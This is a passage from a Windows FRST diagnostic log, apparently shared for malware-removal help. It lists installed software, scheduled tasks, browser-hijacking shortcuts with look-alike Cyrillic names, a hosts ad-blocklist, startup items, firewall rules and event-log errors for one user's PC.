Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7179 - Realtek Semiconductor Corp.)
Revo Uninstaller Pro 3.1.7 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.7 - VS Revo Group, Ltd.)
Setup (x32 Version: 19.5.0.35 - Corel Corporation) Hidden
Share64 (Version: 19.5.0.35 - Corel Corporation) Hidden
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 3.5.0.1144 - Lenovo)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.1 - Synaptics Incorporated)
TextPad 8 (HKLM-x32\...\{861AB1C1-1967-4C4A-BF86-C255E2D2B8FD}) (Version: 8.0.2 - Helios)
TNod User & Password Finder (HKLM\...\TNod) (Version: 1.6.0.0 - Tukero[X]Team)
Toolkit Documentation (x32 Version: 8.100.26866 - Microsoft) Hidden
TOSHIBA Desktop Assist (HKLM\...\{C4CDCEF0-0A7A-4425-887C-33E39533D758}) (Version: 1.03.01.6402 - Toshiba Corporation)
TOSHIBA Display Utility (HKLM\...\{5F6AC07E-50EF-422E-B56E-6521E5B35139}) (Version: 1.1.12.0 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{94D2A899-0C34-4420-880E-AE337E635AB0}) (Version: 2.4.1.6404 - Toshiba Corporation)
TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version: 1.1.0003.6401 - Toshiba Corporation)
TOSHIBA HDD Accelerator (HKLM\...\{DB4D9937-0B14-4EF1-BF9A-BB7E3B9DCB04}) (Version: 2.2.0000 - Toshiba Corporation)
TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{78931270-BC9E-441A-A52B-73ECD4ACFAB5}) (Version: 3.00.349 - Toshiba Corporation)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.10.1.6400 - Toshiba Corporation)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 3.1.02.55065006 - Toshiba Corporation)
TOSHIBA Service Station (HKLM\...\{BFE4C813-4DD4-4B1C-97F4-76A459055C8D}) (Version: 2.6.13 - Toshiba Corporation)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0032 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{4D57ED72-6B01-40BD-9CA9-012B8FC09CEB}) (Version: 2.0.0.32003 - Toshiba Corporation)
Toy Defense version 1.0.0 (HKLM-x32\...\{B7BB6DD8-E6AC-4E9E-B65F-4DF173FBE43C}_is1) (Version: 1.0.0 - 123FullSetup)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Update for Skype for Business 2015 (KB2889853) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{40930C8E-A677-414C-A72F-DFDEB10738FB}) (Version: - Microsoft)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Viber (HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\{d924dc86-33fe-49b3-9439-8b0e69ec7216}) (Version: 6.4.2.15 - Viber Media Inc.)
Viber (x32 Version: 6.4.2.15 - Viber Media Inc.) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VSClassic64 (Version: 19.5.0.35 - Corel Corporation) Hidden
VSUltimate64 (Version: 19.5.0.35 - Corel Corporation) Hidden
WampServer 2.5 (HKLM-x32\...\WampServer 2_is1) (Version: - Hervé Leclerc (HeL))
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (Toshiba Games) (x32 Version: 4.0.10.20 - WildTangent) Hidden
Windows Assessment and Deployment Kit for Windows 8.1 (HKLM-x32\...\{e9e06304-a604-434b-b35f-d9beb94dc06d}) (Version: 8.100.26866 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 4.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WPT Redistributables (x32 Version: 8.100.26866 - Microsoft) Hidden
WPTx64 (x32 Version: 8.100.26837 - Microsoft) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1061507693-3713582409-3664479191-1001_Classes\CLSID\{5A9E21A2-851A-4BEB-B16F-DBBE7D648AF9}\InprocServer32 -> C:\Program Files (x86)\TextPad 8\System\ShellExt64.dll ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {105F2CB6-0815-49F7-9BCC-2B91FDC5614F} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2016-11-02] (AVG Technologies CZ, s.r.o.)
Task: {292D4DE8-465A-4E7B-893D-95E8FFB0D79A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-30] (Google Inc.)
Task: {45C1D4AE-FE87-40CC-AA69-CE1349216A41} - System32\Tasks\EPSON L220 Series Update {441D2E96-17AE-4DAF-957A-A09CD9765B46} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN2E.EXE [2013-11-22] (SEIKO EPSON CORPORATION)
Task: {62FDCF2B-0A69-4494-B6AA-25101D9D0846} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-01-21] (Realtek Semiconductor)
Task: {7340869A-6955-487C-9F8A-DB689B70598A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {9584C8CB-ACAE-4641-9A2D-E137581DFD3C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-30] (Google Inc.)
Task: {9B728E78-D034-4D9D-A3EA-815DCC511F30} - System32\Tasks\12D0C7EA-D811-4065-9AB-B93C9D95E73E => C:\Users\Ptr. Julius Lampao\AppData\Local\12D0C7EA-D811-4065-9AB-B93C9D95E73E\12D0C7EA-D811-4065-9AB-B93C9D95E73E.exe <==== ATTENTION
Task: {A14D99D7-6186-4C18-844F-C21BF95F0A98} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {A15E0744-D54F-480A-955C-2CC6643222FE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {A5787A85-A678-4B47-9782-744A6FA46D0E} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {AE29672D-3323-471A-860A-EA9BA83D62D1} - System32\Tasks\GoogleUpdateTaskMachineUA1d0e4aa547d74bb => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-30] (Google Inc.)
Task: {CE243A68-0B92-4813-A7FA-0DF02C11DAB7} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
Task: {D6C59573-0C23-4F62-9ECB-A48DFF8BE0E1} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {D85797CF-5585-4310-8889-11F0A394C931} - System32\Tasks\TOSHIBA\Service Station => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe [2013-09-25] (TOSHIBA Corporation)
Task: {E6338573-01FE-4C38-888B-B489B809802A} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-08-22] (Synaptics Incorporated)
Task: {EA24C9C4-7A4D-4A3D-B5D3-622A7E887D8F} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2016-01-30] (Oracle Corporation)
Task: {F42FD3BA-6E79-4793-BCAB-C6957B982186} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2014-12-12] ()
Task: {F6CF9305-7244-4493-AB34-C35743C65BCE} - System32\Tasks\GoogleUpdateTaskMachineCore1d0f2858b2fd7ad => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-30] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\EPSON L220 Series Update {441D2E96-17AE-4DAF-957A-A09CD9765B46}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN2E.EXE:/EXE:{441D2E96-17AE-4DAF-957A-A09CD9765B46} /F:Update WORKGROUP\PASTOR$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Ptr. Julius Lampao\Desktop\FacebookShortCut.lnk -> C:\Users\Ptr. Julius Lampao\Documents\FB2.bat ()

ShortcutWithArgument: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files\Internet Explorer\iexplore.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\КРrохy Васkgrоund Арр.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files\Internet Explorer\iexplore.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" <===== Cyrillic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Public\Desktop\VidеоStudiо Х9 Тrаining.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Internet Explorer\iexplore.exe" <===== Cyrillic
ShortcutWithArgument: C:\Users\Public\Desktop\Моzillа Firеfох.lnk -> C:\Program Files (x86)\HPDef\BrowserRunner.exe (BrowserRunner) -> "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" <===== Cyrillic

==================== Loaded Modules (Whitelisted) ==============

2014-12-11 10:03 - 2015-11-10 07:25 - 00218624 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\ouc.exe
2016-05-21 00:46 - 2016-05-21 00:46 - 00331944 _____ () C:\Program Files (x86)\HPDef\HomePageDefSrv.exe
2010-11-16 21:38 - 2010-11-16 21:38 - 00339456 _____ () C:\ProgramData\DatacardService\HWDeviceService64.exe
2015-07-14 12:59 - 2015-07-14 12:59 - 08898720 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2010-07-15 12:44 - 2010-07-15 12:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll
2016-02-28 19:54 - 2016-02-28 19:54 - 00117384 _____ () C:\Program Files (x86)\TextPad 8\System\ShellExt64.dll
2014-12-11 10:03 - 2014-12-11 10:00 - 00011362 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\mingwm10.dll
2014-12-11 10:03 - 2014-12-11 10:00 - 00043008 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\libgcc_s_dw2-1.dll
2014-12-11 10:03 - 2014-12-11 10:00 - 02415104 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\QtCore4.dll
2014-12-11 10:03 - 2014-12-11 10:00 - 01148416 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\QtNetwork4.dll
2016-03-01 13:48 - 2016-04-14 22:48 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll
2016-11-15 18:03 - 2016-11-09 04:29 - 01819240 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\libglesv2.dll
2016-11-15 18:03 - 2016-11-09 04:29 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-09-22 11:01 - 2016-12-02 02:01 - 01440083 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 localhost
255.255.255.255 broadcasthost
0.0.0.0 ad.beepworld.de
0.0.0.0 ad.beritasatumedia.com
0.0.0.0 ad.bg.doubleclick.net
0.0.0.0 ad.blackystars.com
0.0.0.0 ad.eurosport.com #[oas.eurosport.com]
0.0.0.0 ad.fi.doubleclick.net
0.0.0.0 ad.flux.com
0.0.0.0 ad.foxnetworks.com
0.0.0.0 ad.fr.doubleclick.net
0.0.0.0 ad.freecity.de
0.0.0.0 ad.gazeta.pl
0.0.0.0 ad.gen.tbn.ru
0.0.0.0 ad.glossymedia.pl
0.0.0.0 ad.go.com
0.0.0.0 ad.gr.doubleclick.net
0.0.0.0 ad.hankooki.com
0.0.0.0 ad.hbinc.com
0.0.0.0 ad.hbv.de
0.0.0.0 ad.hi5.com
0.0.0.0 ad.himediadx.com
0.0.0.0 ad.hirekmedia.hu
0.0.0.0 ad.hit.gemius.pl
0.0.0.0 ad.hizlireklam.com
0.0.0.0 ad.hk.doubleclick.net
0.0.0.0 ad.hosting.pl
0.0.0.0 ad.hr.doubleclick.net
0.0.0.0 ad.httpool.com
0.0.0.0 ad.hu.doubleclick.net
0.0.0.0 ad.ie.doubleclick.net

There are 42983 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Theme1\img1.jpg
DNS Servers: 192.168.6.29
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: GamesAppIntegrationService => 2
MSCONFIG\Services: GamesAppService => 3
MSCONFIG\Services: GFNEXSrv => 2
MSCONFIG\Services: Globe Tattoo Broadband. RunOuc => 2
MSCONFIG\Services: HomeGroupListener => 3
MSCONFIG\Services: HomeGroupProvider => 3
MSCONFIG\Services: IJPLMSVC => 2
MSCONFIG\Services: SSFK => 2
MSCONFIG\Services: wuauserv => 3
HKLM\...\StartupApproved\StartupFolder: => "Ginger.lnk"
HKLM\...\StartupApproved\Run: => "HotKeysCmds"
HKLM\...\StartupApproved\Run: => "IgfxTray"
HKLM\...\StartupApproved\Run: => "Persistence"
HKLM\...\StartupApproved\Run: => "TecoResident"
HKLM\...\StartupApproved\Run: => "TNOD UP"
HKLM\...\StartupApproved\Run: => "TCrdMain"
HKLM\...\StartupApproved\Run: => "TSSSrv"
HKLM\...\StartupApproved\Run: => "TosWaitSrv"
HKLM\...\StartupApproved\Run: => "CanonMyPrinter"
HKLM\...\StartupApproved\Run: => "CanonSolutionMenu"
HKLM\...\StartupApproved\Run: => "Corel Update Helper"
HKLM\...\StartupApproved\Run32: => "Adobe ARM"
HKLM\...\StartupApproved\Run32: => "1.TPUReg"
HKLM\...\StartupApproved\Run32: => "AmIcoSinglun64"
HKLM\...\StartupApproved\Run32: => "TSVU"
HKLM\...\StartupApproved\Run32: => "EaseUS EPM tray"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\StartupFolder: => "Canon IJ Status Monitor Canon iP2700 series.lnk"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\Run: => "E09AXLRD_952483187"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\Run: => "SRecorder"
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{67E3733D-DE28-47E5-BA53-26DE28AC33FD}C:\program files (x86)\google\chrome\application\chrome.exe] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{2F934015-5385-4D86-BC48-E816AE445D1A}C:\program files (x86)\google\chrome\application\chrome.exe] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{A4F18ACC-FDEA-4860-B9E8-519CCB8FC7AC}] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{5D0CF972-F8CA-42EF-A095-DCD7FF1A15A6}] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{A562EE2E-292B-4822-93B9-962FD1AFDC1F}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6D0F410D-1796-4D1E-B3E5-D0D416A4CB23}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DDB885CA-29F1-4C7E-B93E-7C3C50DCB35B}C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe] => C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [UDP Query User{FEB98499-1BA0-49D7-9AC2-3CAAC30F2886}C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe] => C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [{ADDECCAC-9593-4FE8-A7E9-8102B9490937}] => C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [{BC38D600-DEB4-4079-82EC-A15ACF2092E9}] => C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [TCP Query User{5372F0A7-7F52-476E-9C64-3BB8F7ABC25D}C:\program files (x86)\skype\phone\skype.exe] => C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{FBBD21E9-4F24-4775-80DB-6890D706D6A0}C:\program files (x86)\skype\phone\skype.exe] => C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{9746468A-AF5E-470A-AEF1-FF22AFD2708E}] => C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{1F310886-6B1A-44AE-A21B-62E901701301}] => C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{6C4E177D-29DB-4DE0-8DF9-6B5DA8DC6A2D}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\USBSetup.exe
FirewallRules: [{E2C9E5F3-1042-4D7A-B984-C4271C999D19}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{AFF01217-DB7C-4199-AB7A-F56988871786}C:\program files\netbeans 8.0.2\bin\netbeans64.exe] => C:\program files\netbeans 8.0.2\bin\netbeans64.exe
FirewallRules: [UDP Query User{22353523-7F6F-4D5D-A6F7-2C08E4BBC8B8}C:\program files\netbeans 8.0.2\bin\netbeans64.exe] => C:\program files\netbeans 8.0.2\bin\netbeans64.exe
FirewallRules: [{538664B1-4865-4ABC-B2BA-720475CF68DD}] => C:\program files\netbeans 8.0.2\bin\netbeans64.exe
FirewallRules: [{F0FCE1DB-A715-466E-B435-69A2554078B3}] => C:\program files\netbeans 8.0.2\bin\netbeans64.exe
FirewallRules: [TCP Query User{40D1F087-A302-4D8D-9068-FCA31E4B8132}D:\uᔄ.exe] => D:\uᔄ.exe
FirewallRules: [UDP Query User{98070BF6-D35F-42C5-B3D5-0F67A5ADC81B}D:\uᔄ.exe] => D:\uᔄ.exe
FirewallRules: [{A1663732-FB28-40DE-88D2-3663373621C3}] => C:\Program Files (x86)\SHAREit\SHAREit\SHAREit.exe
FirewallRules: [{59BEAAD2-0F40-4584-A18F-CBC1E7C9D17A}] => C:\Program Files (x86)\SHAREit\SHAREit\SHAREit.exe
FirewallRules: [{012B3146-E2A6-4464-B7A4-8BAA8F730480}] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{FD2565C2-5ECC-4CA5-87CA-6685710D1314}] => C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{6A8E1ED0-5305-4F96-A45A-F25F73229ADC}] => LPort=2869
FirewallRules: [{BCD7CC67-2862-4281-85DD-942A47A5C3BA}] => LPort=1900
FirewallRules: [{F575462E-FBBF-4D2A-85C4-E835BCD4B8E7}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-11-2016 16:51:06 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
28-11-2016 09:36:58 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/30/2016 02:51:51 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Viber.exe, version: 6.4.2.15, time stamp: 0x582f162d
Faulting module name: Qt5Core.dll, version: 5.6.1.0, time stamp: 0x58073e23
Exception code: 0xc0000005
Fault offset: 0x0002b171
Faulting process id: 0x488
Faulting application start time: 0x01d24a7161f4b604
Faulting application path: C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Viber.exe
Faulting module path: C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Qt5Core.dll
Report Id: e35b89b0-b664-11e6-85ee-202564357a82
Faulting package full name:
Faulting package-relative application ID:

Error: (11/28/2016 06:29:45 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 54.0.2840.99 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 143c

Start Time: 01d2495f02901167

Termination Time: 29844

Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Report Id: 7c17c807-b555-11e6-85ee-202564357a82

Faulting package full name:

Faulting package-relative application ID:

Error: (11/28/2016 09:19:11 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "c:\program files (x86)\EaseUS\easeus partition master 9.2.2\DRW\RdfCheck.exe".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/28/2016 09:13:46 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "c:\program files (x86)\EaseUS\easeus partition master 9.2.2\DRW\RdfCheck.exe".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/27/2016 10:15:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 54.0.2840.99 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1028

Start Time: 01d248b3f4d2a89d

Termination Time: 40

Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Report Id: ede0b1cc-b4ab-11e6-85ee-202564357a82

Faulting package full name:

Faulting package-relative application ID:

Error: (11/27/2016 11:57:59 AM) (Source: Desktop Window Manager) (EventID: 9020) (User: )
Description: The Desktop Window Manager has encountered a fatal error (0x8898008d)

Error: (11/26/2016 10:40:46 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Viber.exe, version: 6.4.2.15, time stamp: 0x582f162d
Faulting module name: Qt5Core.dll, version: 5.6.1.0, time stamp: 0x58073e23
Exception code: 0xc0000005
Fault offset: 0x0002b169
Faulting process id: 0x3b8
Faulting application start time: 0x01d2478e67b74602
Faulting application path: C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Viber.exe
Faulting module path: C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Qt5Core.dll
Report Id: baf87288-b381-11e6-85ed-202564357a82
Faulting package full name:
Faulting package-relative application ID:

Error: (11/20/2016 03:37:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: wmprph.exe, version: 12.0.9600.16384, time stamp: 0x5215ef9d
Faulting module name: ntdll.dll, version: 6.3.9600.18007, time stamp: 0x55c4c16b
Exception code: 0xc0000005
Fault offset: 0x000000000003d86e
Faulting process id: 0x904
Faulting application start time: 0x01d24300fb256820
Faulting application path: C:\Program Files\Windows Media Player\wmprph.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 39a9cc28-aef4-11e6-85ed-202564357a82
Faulting package full name:
Faulting package-relative application ID:

Error: (11/08/2016 09:16:01 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\Corel\Corel VideoStudio X9\x86\ssBridge32.exe".
Dependent Assembly Microsoft.VC80.ATL,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/08/2016 08:54:13 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\Corel\Corel VideoStudio X9\MultiCamService.exe".
Dependent Assembly Microsoft.VC90.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.8" could not be found.
Please use sxstrace.exe for detailed diagnosis.


System errors:
=============
Error: (11/30/2016 06:56:46 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.

Error: (11/30/2016 06:56:45 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.

Error: (11/30/2016 06:55:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Globe Tattoo Broadband. OUC service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (11/30/2016 06:55:37 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Globe Tattoo Broadband. OUC service to connect.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
